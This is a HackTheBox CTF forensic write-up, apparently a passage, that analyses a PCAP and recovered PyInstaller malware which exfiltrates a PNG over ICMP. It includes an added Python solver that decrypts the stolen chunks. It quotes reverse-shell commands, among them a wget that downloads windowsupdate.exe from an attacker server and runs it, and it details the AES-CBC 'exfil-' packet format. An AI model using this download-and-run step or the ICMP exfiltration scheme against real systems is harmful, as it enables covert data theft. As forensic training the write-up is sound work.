
Thief Challenge Scenario

HackTheBox

Task: analyze a PCAP and recovered malware from a host compromise where data is stolen over ICMP. Solution: recover the PyInstaller payload, reverse its AES-CBC exfil format, rebuild chunk order from ICMP id/seq, decrypt the PNG, and read the flag.


Description

Analyze the provided traffic capture and recovered files to determine what was exfiltrated and recover the flag.

We are given a PCAP, a recovered Windows executable, and the final recovered image. The goal is to understand the compromise chain, reverse the exfiltration method, reconstruct the stolen file, and extract the flag.

Analysis

Step 1: Quick traffic reconnaissance

The PCAP immediately showed two important phases:

  1. A large TCP transfer from 10.2.32.72 to 192.168.127.146
  2. Later ICMP traffic from the victim toward 172.67.139.222

There was also an interactive session on TCP/5349, which turned out to be a reverse shell. Commands visible in that shell included:

  whoami
  hostname
  systeminfo
  wget http://10.2.32.72:4953/windowsupdate.exe -outfile windowsupdate.exe
  dir
  windowsupdate.exe 1dub.png
  ./windowsupdate.exe 1dub.png

This gives the whole storyline: the attacker gained a shell, downloaded windowsupdate.exe from an internal HTTP server on port 4953, and executed it against 1dub.png.

Step 2: Recover the malware from HTTP

Exporting HTTP objects from the request GET /windowsupdate.exe on TCP/4953 recovered the payload exactly.

Basic triage:

  file windowsupdate.exe
  strings -n 6 windowsupdate.exe | rg 'scapy|Crypto|AES|exfil|Bloodharbor'

That quickly suggested a PyInstaller-packed Python sample using:

  • scapy for raw packet transmission
  • Crypto.Cipher.AES / PyCryptodome for encryption
  • the string exfil-
  • the static key material The Bloodharbor!

Decompiling the extracted .pyc with uncompyle6 revealed the core logic.

Step 3: Understand the exfiltration format

The malware reads the target file, splits it into 256-byte chunks, zero-pads the final chunk, and encrypts each chunk independently with AES-CBC.

The encrypted packet payload format is:

  6-byte prefix:   exfil-
  16-byte IV:      random per chunk
  256-byte blob:   AES-CBC ciphertext of one 256-byte file chunk

So each ICMP echo-request payload is exactly 278 bytes.

The key is static:

The Bloodharbor!
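The parsing, reordering and decryption this format calls for, as an added example rather than the challenge author's solver. It assumes the echo-request packets have already been pulled out of the PCAP as (icmp_id, icmp_seq, payload) tuples (for instance with scapy's pkt[ICMP].id, pkt[ICMP].seq and bytes(pkt[Raw])) and that pycryptodome is installed; the sample packets in the test are constructed.

```python
# Added example (not the page's own code): reassemble and decrypt the
# "exfil-" ICMP payloads described above. Packet tuples are assumed to
# be (icmp_id, icmp_seq, payload) for ICMP echo requests pulled from the PCAP.
from typing import Dict, List, Tuple

PREFIX = b"exfil-"
IV_LEN, CHUNK_LEN = 16, 256
PAYLOAD_LEN = len(PREFIX) + IV_LEN + CHUNK_LEN    # 278 bytes per echo request
KEY = b"The Bloodharbor!"                         # static key recovered from the sample


def parse_payload(payload: bytes) -> Tuple[bytes, bytes]:
    """Split one ICMP payload into (iv, ciphertext); reject anything off-format."""
    if len(payload) != PAYLOAD_LEN or not payload.startswith(PREFIX):
        raise ValueError("not a 278-byte exfil- payload")
    iv = payload[len(PREFIX):len(PREFIX) + IV_LEN]
    return iv, payload[len(PREFIX) + IV_LEN:]


def reassemble(packets: List[Tuple[int, int, bytes]]) -> List[Tuple[bytes, bytes]]:
    """Put chunks back in order by ICMP (id, seq).

    Unrelated pings are skipped, and a retransmit or an echo reply carrying
    the same (id, seq) is ignored because the first copy wins.  If seq wrapped
    at 16 bits for a very large file, capture order would be needed as well.
    """
    seen: Dict[Tuple[int, int], bytes] = {}
    for icmp_id, seq, payload in packets:
        if payload.startswith(PREFIX):
            seen.setdefault((icmp_id, seq), payload)
    return [parse_payload(seen[k]) for k in sorted(seen)]


def decrypt_chunks(chunks: List[Tuple[bytes, bytes]], key: bytes = KEY) -> bytes:
    """Each chunk was encrypted independently with its own IV, so decrypt one
    AES-CBC context per chunk and concatenate the plaintexts."""
    from Crypto.Cipher import AES   # pycryptodome, the library the sample used
    return b"".join(AES.new(key, AES.MODE_CBC, iv).decrypt(ct) for iv, ct in chunks)


def strip_zero_pad(data: bytes) -> bytes:
    """Drop the zero padding of the final chunk.  A PNG ends in IEND plus a
    4-byte CRC (ae 42 60 82), so everything after that is padding; for other
    file types fall back to stripping trailing zeros, which may over-trim."""
    end = data.rfind(b"IEND")
    return data[:end + 8] if end != -1 else data.rstrip(b"\x00")
```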

...